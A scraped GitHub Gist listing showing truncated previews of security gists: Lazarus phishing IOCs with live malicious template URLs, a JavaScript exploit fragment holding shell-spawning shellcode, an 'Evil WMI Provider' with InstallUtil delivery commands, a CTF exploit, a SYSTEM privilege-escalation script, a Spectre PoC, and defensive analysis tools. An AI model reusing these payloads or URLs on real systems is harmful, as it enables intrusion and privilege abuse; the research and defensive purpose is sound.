hoangcuongflp hoangcuongflp
mak
/ ioc.txt
Created
May 14, 2020 16:20
Lazarus camaping using @LockheedMartin, @BAESystemsplc, @Boeing as decoys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| first stage documents: | |
| LM_IFG_536R.docx.docx - 9724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0 | |
| Boeing_PMS.docx - a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063 | |
| Senior_Design_Engineer.docx - 49724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0 | |
| Boeing_DSS_SE.docx - 322aa22163954ff3ff017014e357b756942a2a762f1c55455c83fd594e844fdd | |
| remote templates: | |
| https://www.astedams.it/uploads/frame/61.dotm | |
| https://www.astedams.it/uploads/template/17.dotm |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5]; | |
| let conva = new ArrayBuffer(8) | |
| let convi = new Uint32Array(conva); | |
| let convf = new Float64Array(conva); | |
| function i2f(i) { | |
| convi[0] = i%0x100000000; | |
| convi[1] = i/0x100000000; | |
| return convf[0]; |
TheWover
/ EvilWMIProvider.cs
Created
February 19, 2019 19:36
— forked from nicholasmckinney/EvilWMIProvider.cs
Evil WMI Provider
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Based On LocalAdmin WMI Provider by Roger Zander | |
| // http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
| // Adapted For Evil By @subTee | |
| // Executes x64 ShellCode | |
| // | |
| // Deliver and Install dll | |
| // C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
| // Invoke calc for SYSTEM level calculations | |
| // Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
| // Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
silverwolfceh
/ fbshield.py
Last active
November 7, 2020 01:21
Turn on or off facebook shield (profile picture guard)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| USER_TOKEN = "" #Fill your fb user token (open https://facebook.com/me, ctrl +u and copy access token | |
| SHIELD_ENABLE = "true" #Change to false if turn off shield | |
| def get_userid(token): | |
| url = "https://graph.facebook.com/me?access_token=%s" % token |
datbmt
/ crypto01.py
Created
August 19, 2018 12:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| from pwn import u64, p64 | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect(('43.224.35.245', 3425)) | |
| print s.recv(1024) | |
| print s.recv(1024) | |
| s.send('manh\n') | |
| print s.recv(1024) | |
| def my_recv(): |
williballenthin
/ functions_as_data.py
Created
July 30, 2018 21:03
IDA Pro script to identify functions that are referenced as data.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Identify functions that are referenced as data. | |
| For example, something weird is going on below:: | |
| .text:10001833 BE 60 25 00 10 mov esi, offset sub_10002560 <<<< | |
| .text:10001838 8B 45 FC mov eax, [ebp+var_4] | |
| .text:1000183B 89 5F 04 mov [edi+4], ebx | |
| .text:1000183E 81 C7 18 02 00 00 add edi, 218h | |
| .text:10001844 F3 A5 rep movsd |
mattifestation
/ SysmonEventGUIDParser.ps1
Last active
April 23, 2025 13:16
Extracts fields from sysmon process and logon GUIDs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| $Epoch = Get-Date '01/01/1970' | |
| # Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/ | |
| $StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName | |
| $TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone) | |
| # Parse out all the LogonGUID fields for sysmon ProcessCreate events | |
| Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This GIST has been transformed into a Git repository and does not receive updates anymore | |
| # | |
| # Please visit the github repo to get a current list | |
| # https://github.com/Neo23x0/ti-falsepositives/ | |
| # Hashes that are often included in IOC lists but are false positives | |
| HASH_WHITELIST = [ | |
| # Empty file | |
| 'd41d8cd98f00b204e9800998ecf8427e', | |
| 'da39a3ee5e6b4b0d3255bfef95601890afd80709', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* https://spectreattack.com/spectre.pdf */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
makelariss
/ popshellslikeitsatuesday.py
Last active
August 17, 2025 03:17
NT AUTHORITY\SYSTEM through Handle Inheritance using Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| import enum, os, sys | |
| # https://twitter.com/highsenburger69 | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
NewerOlder